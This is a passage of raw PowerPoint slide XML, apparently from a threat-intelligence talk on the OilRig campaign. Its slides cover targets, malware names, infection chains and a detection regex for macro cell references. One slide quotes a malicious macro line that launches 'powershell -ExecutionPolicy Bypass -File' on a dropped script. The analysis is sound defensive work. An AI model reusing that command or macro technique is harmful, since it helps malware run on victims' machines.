            <a:off x="7923521" y="2648715"/>
            <a:ext cx="1649046" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unable to prove</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>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711B9996-F656-4832-A50C-76A31A6A58FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7923521" y="3638958"/>
            <a:ext cx="1649046" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unable to prove</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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2822687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348" y="1925022"/>
            <a:ext cx="9134652" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OILRIG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1412338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469937" y="205981"/>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Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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Oilrig Campaign</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1650296" y="1069340"/>
            <a:ext cx="6528504" cy="2044611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469938" y="3219452"/>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000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Active since ::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> February 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Likes ::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PowerShell, Macros and DNS C2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Enjoys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Lebanon, Israel, Saudi Arabia, Qatar, USA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24968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US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Oilrig Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599670" y="3966918"/>
            <a:ext cx="791949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971581" y="3315083"/>
            <a:ext cx="234839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29737" y="117703"/>
            <a:ext cx="3317010" cy="369332"/>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HerHer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/Helminth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620098" y="3732876"/>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6522" y="4193161"/>
            <a:ext cx="1059180" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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JAN ‘15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263673" y="3735336"/>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a:off x="3865048" y="3737331"/>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a:off x="5480487" y="3738040"/>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7139584" y="3738040"/>
            <a:ext cx="0" cy="460285"/>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23320" y="4174693"/>
            <a:ext cx="1059180" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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JAN ‘16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6701326" y="4179283"/>
            <a:ext cx="1059180" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JAN ‘17</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683945" y="319769"/>
            <a:ext cx="6389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96426" y="526172"/>
            <a:ext cx="3317010" cy="369332"/>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Sandtrap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Straight Arrow Connector 46"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683945" y="761633"/>
            <a:ext cx="638908"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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3484162" y="2759849"/>
            <a:ext cx="697409" cy="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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846320" y="2264353"/>
            <a:ext cx="3672840"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a:off x="5683945" y="1039654"/>
            <a:ext cx="6389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504319" y="885125"/>
            <a:ext cx="1194582" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Clayslide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Rectangle 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4381735" y="1400365"/>
            <a:ext cx="423575" cy="25454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IRANIAN NEW YEAR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343617" y="108922"/>
            <a:ext cx="1933444"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Other wrappers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67" name="Straight Arrow Connector 66"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187534" y="296494"/>
            <a:ext cx="638908" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="AD236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a:off x="6639951" y="1876170"/>
            <a:ext cx="856963" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="AD236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876401" y="1397459"/>
            <a:ext cx="423575" cy="25454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IRANIAN NEW YEAR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1623026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317539" y="205981"/>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Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223521" y="282965"/>
            <a:ext cx="8717846"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Typical infection chain for </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a: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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01</a:t>
            </a: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-2016 – 02-2017)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3082725" y="2229211"/>
            <a:ext cx="77936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518354" y="2229211"/>
            <a:ext cx="779361"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828465" y="1333258"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522663" y="1333257"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300423" y="1333258"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950718" y="2814320"/>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11485" y="3529803"/>
            <a:ext cx="8351236" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveWorkbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\.Worksheets\([a-zA-Z0-9\"{1,24}]\”\).Cells\([ 0-9]{1,4},[ 0-9]{1,4}\”\)/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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01890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317539" y="205981"/>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Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3082725" y="2229211"/>
            <a:ext cx="77936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518354" y="2229211"/>
            <a:ext cx="779361"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828465" y="1333258"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522663" y="1333257"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300423" y="1333258"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4490718" y="2814320"/>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2559" y="3367243"/>
            <a:ext cx="8981441" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DnECmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Bypass -File "&amp;HOME&amp;"DnE.ps1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
